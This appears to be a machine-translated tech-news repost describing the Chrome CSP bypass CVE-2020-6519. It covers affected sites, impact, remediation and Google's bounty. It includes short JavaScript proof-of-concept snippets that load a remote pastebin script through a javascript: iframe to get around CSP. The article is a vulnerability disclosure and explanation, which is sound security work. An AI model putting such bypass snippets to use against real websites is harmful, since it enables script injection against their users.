Shulou(Shulou.com)05/31 Report--

The purpose of this article is to share with you about how the CSP strategy of Chrome browser bypasses loopholes. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article.

The following describes how the original author found that the CSP (content Security Policy) of Google browser Chrome completely bypassed the vulnerability (CVE-2020-6519), affecting all versions of Chrome browsers released after March 2019, resulting in the complete invalidation of CSP policies on many large corporate websites in the face of this vulnerability. The vulnerability eventually received a reward of $3000 from Google.

The tragedy of completely bypassing the CSP strategy

I was shocked to discover that this vulnerability exists in Chrome, Opera, and Edge browsers based on the Chromium kernel and affects Windows, Mac, and Android platforms, which can be exploited by attackers to bypass all Chrome built-in CSP policies from March 2019 to July 2020.

The severity of the vulnerability is that since Chrome browsers have more than 2 billion users and account for more than 65 per cent of the browser market, the vulnerability could potentially affect billions of users.

In addition, this vulnerability exists on the websites of many large companies. Such as Facebook,WellsFargo, Gmail, Zoom, Tiktok, Instagram, WhatsApp, Investopedia, ESPN, Roblox, Indeed, Blogger, Quora and so on.

Completely break through the restriction of Chrome's CSP policy with a simple method

If you are interested, you can click here to study the POC verification file published by Google, but the reasons for the vulnerability are as follows:

In general, in a Chrome browser with CSP policy set, if you want to execute the following JS script, because the CSP policy does not allow the source or operation in the script to be executed, it will be blocked on the browsing side. (in the pastebin link is a script):

/ * this is a script that pops an alert message * / top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';/* this call will fail due to CSP * / var s = document.createElement ("script"); s.src = top._CVE_URL; document.body.appendChild (s)

However, if you use the iframe method of _ javascript: src to run the above JS script, you can completely break the CSP policy restriction of Chrome browser and successfully run the script:

/ * this is a script that pops an alert message * / top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';/* this call will succeed although CSP * / document.querySelector (' DIV') [xss_clean] = ""

It's so simple and rude! As a result, billions of client browsers in any operating system are affected, and attackers can perform CSP escalation in their clients in this way, resulting in malicious code execution.

It is important to note that there are some websites configured with CSP policies that are not affected by this vulnerability, such as Twitter, Github, LinkedIn, Google Play Store, Yahoo's Login Page, PayPal and Yandex. These websites apply server-side nonce or hash verification in the client configuration, so they are relatively secure and unaffected.

Vulnerability impact

CSP, content security policy, is an access policy and rule of a website, which tells the client which external resources can be loaded and executed in the website, and the client initiates access to the website.

Under the CSP policy rules, the website can perform allow / block operations against requests such as JS code of the client browser to prevent client users from being affected by attacks such as XSS, so as to form a security barrier.

To be clear here, because an attacker exploits this vulnerability and needs to build a malicious script that requests access to the website, the CSP policy in the Chrome browser bypasses the vulnerability and does not directly affect the website, which is why the vulnerability is rated as medium-risk.

The basic situation of this vulnerability is that this CSP policy of Chrome browsers bypasses the flaw, resulting in the invalidation of many websites' own CSP policy rules. There are two situations here: first, some websites are configured with strict CSP policies, such as the Twitter above, and this vulnerability cannot invalidate their policies; second, some websites are configured with general CSP policies, which can invalidate their CSP policies completely.

In addition to the above-mentioned websites, based on this vulnerability, it can be conservatively estimated that thousands of industry websites, including e-commerce, banking, telecommunications, government and public utilities, will be affected, and attackers can exploit this vulnerability to inject malicious code into client users of these sites.

Some people may say that the premise of this kind of vulnerability exploitation is that the attacker must obtain code execution permission on the website, so it is not interesting for CSP to bypass the vulnerability. But I don't think so.

Because most websites rely on CSP policy to provide client security protection, the emergence of this kind of loophole is a serious risk to the security operation mechanism of the website itself.

Six months ago, I discovered a storage XSS vulnerability in WhatsApp Web/Desktop applications, which describes a large number of harm that can be caused by CSP bypass vulnerabilities. The danger of CSP bypass vulnerabilities is that the improper CSP policy configuration of many websites allows attackers to inject malicious scripts to communicate with domain names related to arbitrary websites.

Because of this, it is very difficult to find a code execution vulnerability beyond the control of the administrator in the website, but once this vulnerability exists, it may pose a fatal threat to the site itself.

Vulnerability testing

I wrote a test script myself and then used Chrome's developer tools to easily test which sites were affected by the vulnerability. The external JS script called in the test is linked to https://pastebin.com/raw/XpHsfXJQ, which triggers the vulnerability implementation.

The following is how Facebook websites are affected by this vulnerability:

The following is how Github websites are affected by this vulnerability:

Not affected by this vulnerability:

Repair suggestion

For website operators, first of all, it is necessary to ensure that the website has strict CSP policy rules, and secondly, we can consider adding some server-side nonce or hash verification measures, or JS scripts and malicious code injection detection mechanism, and the common configuration of various security policies in order to ensure the security of the website. For the client, update Chrome to version 84 or later.

Vulnerability patch

Google's Chromium project team fixed the vulnerability in time and made a patch update after Chrome 84, which was eventually rated as CVSS 6.5, and the author received a $3000 award.

This is how the CSP strategy of Chrome browsers bypasses loopholes. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.